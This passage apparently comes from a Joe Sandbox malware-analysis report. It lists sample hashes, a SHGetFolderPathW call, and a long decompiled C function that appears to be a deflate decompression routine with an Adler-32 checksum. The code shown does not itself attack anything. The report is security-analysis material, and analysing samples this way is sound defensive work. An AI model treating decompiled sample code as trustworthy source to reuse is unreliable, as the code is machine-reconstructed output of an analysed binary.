                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$AgentObtainStringUser
                  • String ID:
                  • API String ID: 1410626495-0
                  • Opcode ID: be19bc15010d0741be8f0ae2a0f914217170398782f3269a69305a203e6730c8
                  • Instruction ID: c7da917df9b89f1375c758ecb66f70f82b522fe01f28cd91f55593c37db2b19c
                  • Opcode Fuzzy Hash: be19bc15010d0741be8f0ae2a0f914217170398782f3269a69305a203e6730c8
                  • Instruction Fuzzy Hash: 90E086F1514118ABE710EB60DE46FDA73BC9B40305F1041BAAF18F10D1F6746A0945AD
                  Uniqueness

                  Uniqueness Score: 0.05%

                  Function 0040F214, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID:
                  • API String ID: 1514166925-0
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Non-executed Functions

                  Function 00404AD4, Relevance: 24.4, APIs: 11, Strings: 2, Instructions: 1626UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed char _v56;
				intOrPtr _v60;
				int* _v64;
				signed int _v68;
				int _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v144;
				signed int _v148;
				void _v212;
				signed int _t759;
				signed int* _t763;
				void* _t764;
				signed int _t769;
				signed int _t770;
				intOrPtr _t771;
				int _t772;
				signed int _t774;
				void* _t775;
				signed int _t782;
				void* _t785;
				signed int* _t786;
				void* _t792;
				intOrPtr _t795;
				signed char* _t813;
				intOrPtr _t815;
				void* _t816;
				signed int _t819;
				intOrPtr _t822;
				signed int _t823;
				signed int _t828;
				signed int _t830;
				signed int _t834;
				unsigned int _t836;
				signed int _t837;
				signed int _t841;
				unsigned int _t843;
				signed int _t846;
				signed int _t849;
				unsigned int _t850;
				signed int _t852;
				signed char _t853;
				signed int _t855;
				signed int _t864;
				signed int _t865;
				signed int _t868;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				void* _t875;
				signed int _t879;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t889;
				char _t890;
				signed int _t894;
				signed int _t900;
				signed int _t902;
				signed char _t908;
				signed int _t910;
				signed int _t913;
				signed int _t915;
				signed int _t919;
				signed int _t920;
				signed int _t922;
				signed int _t926;
				signed int _t934;
				intOrPtr _t937;
				signed int _t939;
				signed int _t941;
				signed int _t948;
				signed int _t960;
				signed int _t962;
				signed char _t968;
				signed int _t970;
				signed int _t972;
				intOrPtr _t988;
				signed int _t989;
				void* _t999;
				signed int _t1004;
				signed int _t1008;
				signed int _t1009;
				signed int _t1011;
				signed int _t1014;
				signed int _t1019;
				signed int _t1029;
				signed int _t1031;
				signed char _t1037;
				signed int _t1039;
				signed int _t1041;
				signed int _t1044;
				signed int _t1046;
				signed int _t1051;
				signed int _t1060;
				signed int _t1066;
				int _t1067;
				signed int _t1075;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1090;
				signed int _t1091;
				signed int _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1112;
				signed int _t1113;
				void* _t1114;
				intOrPtr _t1115;
				signed char* _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1121;
				signed int _t1123;
				signed int _t1124;
				signed int _t1126;
				signed int _t1127;
				signed char _t1128;
				signed int _t1135;
				signed int _t1137;
				signed int _t1138;
				signed int* _t1139;
				signed int _t1141;
				unsigned int _t1145;
				signed int _t1146;
				void* _t1157;
				void* _t1158;
				signed char _t1161;
				signed int _t1163;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed char _t1169;
				unsigned int _t1170;
				signed char _t1176;
				signed int _t1177;
				signed int _t1185;
				signed int* _t1187;
				signed int _t1191;
				signed char _t1194;
				signed int _t1195;
				void* _t1197;
				signed int _t1198;
				signed int _t1199;
				signed char _t1200;
				signed int _t1201;
				signed int _t1202;
				signed char _t1203;
				int _t1205;
				intOrPtr* _t1208;
				signed char _t1216;
				signed int _t1219;
				signed int* _t1221;
				signed int _t1222;
				signed char _t1229;
				signed int _t1232;
				signed char _t1233;
				signed char _t1234;
				void* _t1239;
				void* _t1244;
				intOrPtr _t1245;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed char _t1251;
				int _t1253;
				signed int _t1256;
				signed char _t1263;
				signed int _t1266;
				signed int _t1267;
				signed char _t1270;
				signed char _t1271;
				signed int _t1274;
				void* _t1275;
				signed int _t1277;
				signed int _t1279;
				void* _t1288;
				signed int _t1291;
				void* _t1296;
				signed int _t1299;
				signed int _t1301;
				int* _t1302;
				unsigned int _t1303;
				signed int _t1304;
				void* _t1305;
				int _t1310;
				signed int _t1315;
				signed int _t1317;
				signed int _t1320;
				unsigned int _t1321;
				char* _t1322;
				signed int _t1326;
				int* _t1350;
				signed int _t1351;
				signed int* _t1352;
				signed int _t1355;
				signed int _t1358;
				intOrPtr _t1359;
				void* _t1363;
				signed int _t1364;
				signed int _t1365;
				void* _t1366;
				void* _t1367;
				void* _t1368;
				void* _t1369;
				void* _t1370;
				void* _t1371;
				void* _t1372;
				signed int _t1373;
				int _t1374;
				signed int _t1375;
				int* _t1376;
				void* _t1377;
				void* _t1378;
				void* _t1379;
				void* _t1384;
				void* _t1385;

				_t1288 = __edx;
				_v16 = __edx;
				_t1113 = _t1112 | 0xffffffff;
				_v76 = __edx;
				_t1363 = _a12;
				_v36 =  *_a4 + __edx;
				_t1350 = __ecx;
				_v20 = _t1113;
				_v64 = __ecx;
				_t759 =  *_a16;
				_v32 = _t1363;
				_v60 = _t759 + _t1363;
				_t1135 = _a20 & 0x00000004;
				_v52 = _t1135;
				if(_t1135 == 0) {
					_t16 = _t1363 - 1; // 0x7
					_t1137 = _t16 + _t759 - _a8;
					__eflags = _t1137;
					_v68 = _t1137;
				} else {
					_t1137 = _t1113;
					_v68 = _t1113;
				}
				_t18 = _t1137 + 1; // 0x8
				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
					 *_a16 =  *_a16 & 0x00000000;
					_t763 = _a4;
					 *_t763 =  *_t763 & 0x00000000;
					__eflags =  *_t763;
					_t764 = 0xfffffffd;
					return _t764;
				} else {
					_v28 = _v28 & 0x00000000;
					_t1364 = _t1350[1];
					_t1138 = _t1350[9];
					_v8 = _t1350[0xe];
					_v44 = _t1350[8];
					_v56 = _t1350[0xa];
					_v72 = _t1350[0xf];
					_t769 =  *_t1350;
					_v48 = _t1364;
					_v12 = _t1138;
					_v24 = 1;
					_v80 = 0x90;
					_t1384 = _t769 - 0x18;
					if(_t1384 > 0) {
						__eflags = _t769 - 0x25;
						if(__eflags > 0) {
							_t770 = _t769 - 0x26;
							__eflags = _t770;
							if(_t770 == 0) {
								_t1139 = _v32;
								_t771 = _v60;
								L59:
								__eflags = _t1288 - _v36;
								if(_t1288 >= _v36) {
									 *_t1350 = 0x26;
									L335:
									_t772 = _v24;
									L336:
									_t1114 = 0xfffffffc;
									_t1113 =  !=  ? _t772 : _t1114;
									L337:
									_v20 = _t1113;
									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
										L343:
										_t1350[1] = _t1364;
										asm("bts ecx, esi");
										_t774 =  >=  ? 0 : 0;
										_t1141 = 0 ^ _t774;
										_t775 =  >=  ? _t1141 : _t774;
										_t1350[8] = _v44;
										_t1350[9] = _v12;
										_t1350[0xa] = _v56;
										_t1350[0xf] = _v72;
										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
										 *_a4 = _t1288 - _v76;
										_t782 = _v32 - _a12;
										_v32 = _t782;
										 *_a16 = _t782;
										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
											L360:
											return _t1113;
										} else {
											_a4 = 0x15b0;
											_t1291 = _t782 % _a4;
											_t1145 = _t1350[7];
											_t1365 = _t1145 & 0x0000ffff;
											_t1146 = _t1145 >> 0x10;
											_v68 = _t1291;
											if(_v32 == 0) {
												L357:
												_t1350[7] = (_t1146 << 0x10) + _t1365;
												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
													_t785 = 0xfffffffe;
													_t1113 =  !=  ? _t785 : _t1113;
												}
												goto L360;
											}
											_t1351 = 0xfff1;
											do {
												_t786 = 0;
												_a16 = 0;
												if(_t1291 <= 7) {
													L351:
													if(_t786 >= _t1291) {
														goto L355;
													}
													_t1116 = _a12;
													_t1296 = _t1291 - _t786;
													do {
														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
														_t1116 =  &(_t1116[1]);
														_t1146 = _t1146 + _t1365;
														_t1296 = _t1296 - 1;
													} while (_t1296 != 0);
													_a12 = _t1116;
													goto L355;
												}
												_t1352 = _a16;
												_push(7);
												_t795 = 0 - _a12;
												_v80 = _t795;
												_t1115 = _t795;
												do {
													_t1352 =  &(_t1352[2]);
													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
													_t813 =  &(_a12[8]);
													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
													_a12 = _t813;
												} while ( &(_t813[_t1115]) < _t1291);
												_a16 = _t1352;
												_t786 = _t1352;
												_t1351 = 0xfff1;
												goto L351;
												L355:
												_t1365 = _t1365 % _t1351;
												_t792 = _v32 - _v68;
												_t1146 = _t1146 % _t1351;
												_t1291 = _a4;
												_v32 = _t792;
												_v68 = _t1291;
											} while (_t792 != 0);
											_t1113 = _v20;
											_t1350 = _v64;
											goto L357;
										}
									} else {
										L339:
										_t815 = _v76;
										while(_t1288 > _t815) {
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												goto L343;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1364;
										}
										goto L343;
									}
								}
								_t1373 = _v12;
								_t816 = _t771 - _t1139;
								_t1157 = _v36 - _t1288;
								__eflags = _t816 - _t1157;
								_t1158 =  <  ? _t816 : _t1157;
								__eflags = _t1158 - _t1373;
								_t1374 =  <  ? _t1158 : _t1373;
								memcpy(_v32, _t1288, _t1374);
								_t1379 = _t1379 + 0xc;
								_t1288 = _v16 + _t1374;
								_t1139 = _v32 + _t1374;
								_t819 = _v12 - _t1374;
								__eflags = _t819;
								_v16 = _t1288;
								_t1364 = _v48;
								_v32 = _t1139;
								_v12 = _t819;
								L61:
								__eflags = _t819;
								if(_t819 != 0) {
									L279:
									_t771 = _v60;
									__eflags = _t1139 - _t771;
									if(_t1139 < _t771) {
										goto L59;
									}
									_t1113 = 2;
									_v20 = _t1113;
									 *_t1350 = 9;
									goto L339;
								}
								L62:
								__eflags = _t1350[5] & 0x00000001;
								if((_t1350[5] & 0x00000001) != 0) {
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 >= (_t1364 & 0x00000007)) {
										_t1117 = _v8;
										L311:
										_t822 = _v76;
										_t1161 = _t1364 & 0x00000007;
										_t1118 = _t1117 >> _t1161;
										_t1364 = _t1364 - _t1161;
										__eflags = _t1288 - _t822;
										if(_t1288 <= _t822) {
											L315:
											_t823 = _t1364;
											asm("bts edx, eax");
											__eflags = _t823 - 0x20;
											_t1163 =  >=  ? 0 : 0;
											_t1299 = 0 ^ _t1163;
											__eflags = _t823 - 0x40;
											_t1164 =  >=  ? _t1299 : _t1163;
											_t1119 = _t1118 & _t1299 - 0x00000001;
											__eflags = _a20 & 0x00000001;
											_v8 = _t1119;
											if((_a20 & 0x00000001) == 0) {
												L332:
												_t1288 = _v16;
												L333:
												_t1113 = 0;
												 *_t1350 = 0x22;
												L18:
												_t772 = _v24;
												goto L337;
											}
											_t1165 = 0;
											__eflags = 0;
											L317:
											_v12 = _t1165;
											__eflags = _t1165 - 4;
											if(_t1165 >= 4) {
												goto L332;
											}
											__eflags = _t1364;
											if(_t1364 == 0) {
												_t1288 = _v16;
												L327:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													 *_t1350 = 0x2a;
													goto L335;
												}
												_t1166 =  *_t1288 & 0x000000ff;
												_t1301 = _t1288 + 1;
												__eflags = _t1301;
												_v16 = _t1301;
												L329:
												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
												_t1165 = _v12 + 1;
												goto L317;
											}
											__eflags = _t1364 - 8;
											if(_t1364 >= 8) {
												L324:
												_t1166 = _t1119 & 0x000000ff;
												_t1119 = _t1119 >> 8;
												_t1364 = _t1364 - 8;
												_v8 = _t1119;
												goto L329;
											}
											_t1288 = _v16;
											while(1) {
												L322:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													break;
												}
												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
												_t1288 = _t1288 + 1;
												_t1119 = _t1119 | _t828;
												_v16 = _t1288;
												_t1364 = _t1364 + 8;
												_v8 = _t1119;
												__eflags = _t1364 - 8;
												if(_t1364 < 8) {
													continue;
												}
												goto L324;
											}
											 *_t1350 = 0x29;
											goto L335;
										} else {
											goto L312;
										}
										while(1) {
											L312:
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												break;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1288 - _t822;
											if(_t1288 > _t822) {
												continue;
											}
											break;
										}
										_v16 = _t1288;
										goto L315;
									} else {
										goto L306;
									}
									while(1) {
										L306:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t1169 = _t1364;
										_t1364 = _t1364 + 8;
										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
										_t1288 = _t1288 + 1;
										_t1117 = _v8 | _t830;
										_v16 = _t1288;
										_v8 = _t1117;
										__eflags = _t1364 - (_t1364 & 0x00000007);
										if(_t1364 < (_t1364 & 0x00000007)) {
											continue;
										}
										goto L311;
									}
									 *_t1350 = 0x20;
									goto L335;
								}
								L63:
								_t1170 = _v8;
								L66:
								__eflags = _t1364 - 3;
								if(_t1364 < 3) {
									L64:
									__eflags = _t1288 - _v36;
									if(_t1288 >= _v36) {
										 *_t1350 = 3;
										goto L335;
									}
									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
									_t1288 = _t1288 + 1;
									_t1170 = _v8 | _t834;
									_v16 = _t1288;
									_v8 = _t1170;
									_t1364 = _t1364 + 8;
									__eflags = _t1364;
									goto L66;
								}
								_t1364 = _t1364 - 3;
								_t836 = _t1170 & 0x00000007;
								_t1350[5] = _t836;
								_t837 = _t836 >> 1;
								__eflags = _t837;
								_v8 = _t1170 >> 3;
								_v48 = _t1364;
								_t1350[6] = _t837;
								if(_t837 == 0) {
									L253:
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 < (_t1364 & 0x00000007)) {
										L251:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 5;
											goto L335;
										}
										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t841;
										_t1364 = _t1364 + 8;
										__eflags = _t1364;
										_v16 = _t1288;
										goto L253;
									}
									_t1176 = _t1364 & 0x00000007;
									_t843 = _v8 >> _t1176;
									_t1364 = _t1364 - _t1176;
									_v8 = _t843;
									_t1177 = 0;
									__eflags = 0;
									_v48 = _t1364;
									L255:
									_v12 = _t1177;
									__eflags = _t1177 - 4;
									if(_t1177 >= 4) {
										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
										_t819 = _v12;
										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
											L304:
											_v20 = _t1113;
											 *_t1350 = 0x27;
											goto L339;
										}
										_t1139 = _v32;
										L267:
										__eflags = _t819;
										if(_t819 == 0) {
											goto L62;
										}
										__eflags = _t1364;
										if(_t1364 == 0) {
											goto L61;
										}
										__eflags = _t1364 - 8;
										if(_t1364 >= 8) {
											_t1185 = _v8;
											L274:
											_t846 = _t1185 & 0x000000ff;
											_t1364 = _t1364 - 8;
											_v44 = _t846;
											_v8 = _t1185 >> 8;
											_v48 = _t1364;
											L276:
											_t1187 = _v32;
											__eflags = _t1187 - _v60;
											if(_t1187 >= _v60) {
												_t1113 = 2;
												_v20 = _t1113;
												 *_t1350 = 0x34;
												goto L339;
											}
											 *_t1187 = _t846;
											_t1139 =  &(_t1187[0]);
											_t819 = _v12 - 1;
											_v32 = _t1139;
											_v12 = _t819;
											goto L267;
										} else {
											goto L270;
										}
										while(1) {
											L270:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												break;
											}
											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_t1364 = _t1364 + 8;
											_t1185 = _v8 | _t849;
											_v16 = _t1288;
											_v8 = _t1185;
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												continue;
											}
											goto L274;
										}
										 *_t1350 = 0x33;
										goto L335;
									}
									__eflags = _t1364;
									if(_t1364 == 0) {
										L262:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 7;
											goto L335;
										}
										_t850 =  *_t1288;
										_t1288 = _t1288 + 1;
										__eflags = _t1288;
										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
										_t843 = _v8;
										_v16 = _t1288;
										L264:
										_t1177 = _t1177 + 1;
										goto L255;
									}
									__eflags = _t1364 - 8;
									if(_t1364 >= 8) {
										L261:
										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
										_t843 = _t843 >> 8;
										_t1364 = _t1364 - 8;
										_v8 = _t843;
										_v48 = _t1364;
										goto L264;
									} else {
										goto L258;
									}
									while(1) {
										L258:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t852;
										_t1364 = _t1364 + 8;
										_v16 = _t1288;
										__eflags = _t1364 - 8;
										if(_t1364 < 8) {
											continue;
										}
										_t1177 = _v12;
										_t843 = _v8;
										goto L261;
									}
									 *_t1350 = 6;
									goto L335;
								}
								__eflags = _t837 - 3;
								if(_t837 == 3) {
									L298:
									_v20 = _t1113;
									 *_t1350 = 0xa;
									goto L339;
								}
								__eflags = _t837 - _v24;
								if(_t837 != _v24) {
									_t1191 = 0;
									__eflags = 0;
									L72:
									_v12 = _t1191;
									__eflags = _t1191 - 3;
									if(_t1191 < 3) {
										L83:
										_t146 = _t1191 + 0x411014; // 0x40505
										_t853 =  *_t146;
										_v28 = _t853;
										__eflags = _t1364 - _t853;
										if(_t1364 < _t853) {
											L81:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												 *_t1350 = 0xb;
												goto L335;
											}
											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_v8 = _v8 | _t855;
											_t1364 = _t1364 + 8;
											__eflags = _t1364;
											_t1191 = _v12;
											_v16 = _t1288;
											goto L83;
										}
										_t1302 =  &(_t1350[_t1191]);
										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
										_t155 = _v12 + 0x411014; // 0x40505
										_t1194 =  *_t155;
										_v8 = _v8 >> _t1194;
										_t1364 = _t1364 - _t1194;
										_t1195 = _v12;
										_v48 = _t1364;
										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
										_t1191 = _t1195 + 1;
										_t1288 = _v16;
										goto L72;
									}
									memset( &(_t1350[0x6e0]), 0, 0x120);
									_t1303 = _v8;
									_t1379 = _t1379 + 0xc;
									_t864 = 0;
									__eflags = 0;
									L74:
									_v12 = _t864;
									__eflags = _t864 - _t1350[0xd];
									if(_t864 >= _t1350[0xd]) {
										_t1350[0xd] = 0x13;
										L86:
										_t865 = _t1350[6];
										__eflags = _t865;
										if(_t865 < 0) {
											L153:
											_t1288 = _v16;
											L154:
											_t1197 = _v36 - _t1288;
											__eflags = _t1197 - 4;
											if(_t1197 < 4) {
												L173:
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													L178:
													_t1198 = _v8;
													L179:
													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
													_v12 = _t868;
													__eflags = _t868;
													if(_t868 < 0) {
														_t1199 = 0xa;
														do {
															_v12 =  !_v12;
															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
															_t1199 = _t1199 + 1;
															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
															_v12 = _t873;
															__eflags = _t873;
														} while (_t873 < 0);
														L191:
														_v8 = _v8 >> _t1199;
														_t1364 = _t1364 - _t1199;
														__eflags = _t873 - 0x100;
														if(_t873 >= 0x100) {
															L198:
															_t874 = _t873 & 0x000001ff;
															_v12 = _t874;
															__eflags = _t874 - 0x100;
															if(_t874 == 0x100) {
																goto L62;
															}
															_t875 = _t874 * 4 - 0x404;
															_t1200 =  *(_t875 + 0x411020);
															_v56 = _t1200;
															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
															__eflags = _t1200;
															if(_t1200 == 0) {
																L205:
																__eflags = _t1364 - 0xf;
																if(_t1364 >= 0xf) {
																	L210:
																	_t1201 = _v8;
																	L211:
																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
																	_v28 = _t879;
																	__eflags = _t879;
																	if(_t879 < 0) {
																		_t1121 = _v28;
																		_t1321 = _v8;
																		_t1202 = 0xa;
																		do {
																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
																			_t1202 = _t1202 + 1;
																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
																			__eflags = _t1121;
																		} while (_t1121 < 0);
																		_t1288 = _v16;
																		_v28 = _t1121;
																		_t1113 = _t1121 | 0xffffffff;
																		__eflags = _t1113;
																		_t884 = _v28;
																		L224:
																		_v8 = _v8 >> _t1202;
																		_t1364 = _t1364 - _t1202;
																		_t1203 =  *(0x4110a0 + _t884 * 4);
																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
																		_v56 = _t1203;
																		_v44 = _t885;
																		__eflags = _t1203;
																		if(_t1203 == 0) {
																			L230:
																			_t1205 = _v32 - _a8;
																			_v72 = _t1205;
																			__eflags = _t885 - _t1205;
																			if(_t885 <= _t1205) {
																				L232:
																				_t1350 = _v64;
																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
																				__eflags = _v32 - _t1208;
																				_t887 =  >  ? _v32 : _t1208;
																				_t888 = ( >  ? _v32 : _t1208) + _v12;
																				__eflags = ( >  ? _v32 : _t1208) + _v12 - _v60;
																				if(( >  ? _v32 : _t1208) + _v12 <= _v60) {
																					_t889 = _v12;
																					__eflags = _t889 - 9;
																					if(_t889 < 9) {
																						L246:
																						_t1322 = _v32;
																						do {
																							_t890 =  *_t1208;
																							_t1208 = _t1208 + 3;
																							 *_t1322 = _t890;
																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
																							_t1322 = _t1322 + 3;
																							_t894 = _v12 - 3;
																							_v12 = _t894;
																							__eflags = _t894 - 2;
																						} while (_t894 > 2);
																						_v32 = _t1322;
																						__eflags = _t894;
																						if(_t894 <= 0) {
																							goto L153;
																						}
																						 *_t1322 =  *_t1208;
																						_t934 = _v12;
																						__eflags = _t934 - 1;
																						if(_t934 <= 1) {
																							L245:
																							_v32 = _t1322 + _t934;
																							goto L153;
																						}
																						L244:
																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
																						_t934 = _v12;
																						goto L245;
																					}
																					__eflags = _t889 - _v44;
																					if(_t889 > _v44) {
																						goto L246;
																					}
																					_t1126 = _v32;
																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
																					__eflags = _t1326;
																					do {
																						 *_t1126 =  *_t1208;
																						_t937 =  *((intOrPtr*)(_t1208 + 4));
																						_t1208 = _t1208 + 8;
																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
																						_t1126 = _t1126 + 8;
																						__eflags = _t1208 - _t1326;
																					} while (_t1208 < _t1326);
																					_t939 = _v12 & 0x00000007;
																					_v32 = _t1126;
																					_t1113 = _t1126 | 0xffffffff;
																					_v12 = _t939;
																					__eflags = _t939 - 3;
																					if(_t939 >= 3) {
																						goto L246;
																					}
																					__eflags = _t939;
																					if(_t939 == 0) {
																						goto L153;
																					}
																					_t1322 = _v32;
																					 *_t1322 =  *_t1208;
																					_t934 = _v12;
																					__eflags = _t934 - 1;
																					if(_t934 <= 1) {
																						goto L245;
																					}
																					goto L244;
																				}
																				_t1138 = _v12;
																				L234:
																				_t941 = _t1138;
																				_t1138 = _t1138 - 1;
																				_v12 = _t1138;
																				__eflags = _t941;
																				if(_t941 == 0) {
																					goto L153;
																				}
																				L235:
																				__eflags = _v32 - _v60;
																				if(_v32 >= _v60) {
																					_t1113 = 2;
																					_v20 = _t1113;
																					 *_t1350 = 0x35;
																					goto L339;
																				}
																				_v32 = _v32 + 1;
																				_v72 = _v72 + 1;
																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
																				_t1350 = _v64;
																				goto L234;
																			}
																			__eflags = _a20 & 0x00000004;
																			if((_a20 & 0x00000004) != 0) {
																				L296:
																				_v20 = _t1113;
																				 *_t1350 = 0x25;
																				goto L339;
																			}
																			goto L232;
																		}
																		L228:
																		__eflags = _t1364 - _t1203;
																		if(_t1364 < _t1203) {
																			L226:
																			__eflags = _t1288 - _v36;
																			if(_t1288 >= _v36) {
																				 *_t1350 = 0x1b;
																				goto L335;
																			}
																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
																			_t1288 = _t1288 + 1;
																			_v8 = _v8 | _t948;
																			_t1364 = _t1364 + 8;
																			__eflags = _t1364;
																			_t1203 = _v56;
																			_v16 = _t1288;
																			goto L228;
																		}
																		_t1364 = _t1364 - _t1203;
																		_v8 = _v8 >> _t1203;
																		_t534 =  &_v44;
																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
																		__eflags =  *_t534;
																		_t885 = _v44;
																		goto L230;
																	}
																	_t1202 = _t879 >> 9;
																	_t884 = _t879 & 0x000001ff;
																	goto L224;
																}
																__eflags = _v36 - _t1288 - 2;
																if(_v36 - _t1288 >= 2) {
																	_t502 = _t1288 + 1; // 0x83c84d8d
																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
																	_t1288 = _v16 + 2;
																	_v8 = _t1201;
																	_v16 = _t1288;
																	_t1364 = _t1364 + 0x10;
																	goto L211;
																}
																L207:
																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
																_v40 = _t960;
																__eflags = _t960;
																if(_t960 < 0) {
																	__eflags = _t1364 - 0xa;
																	if(_t1364 <= 0xa) {
																		L217:
																		__eflags = _t1288 - _v36;
																		if(_t1288 >= _v36) {
																			 *_t1350 = 0x1a;
																			goto L335;
																		}
																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
																		_t1288 = _t1288 + 1;
																		_t1364 = _t1364 + 8;
																		_t1201 = _v8 | _t962;
																		_v16 = _t1288;
																		_v8 = _t1201;
																		__eflags = _t1364 - 0xf;
																		if(_t1364 < 0xf) {
																			goto L207;
																		}
																		goto L211;
																	}
																	_t1216 = 0xa;
																	_v28 = _t1216;
																	while(1) {
																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
																		_t968 = _v28 + 1;
																		_v40 = _t1219;
																		_v28 = _t968;
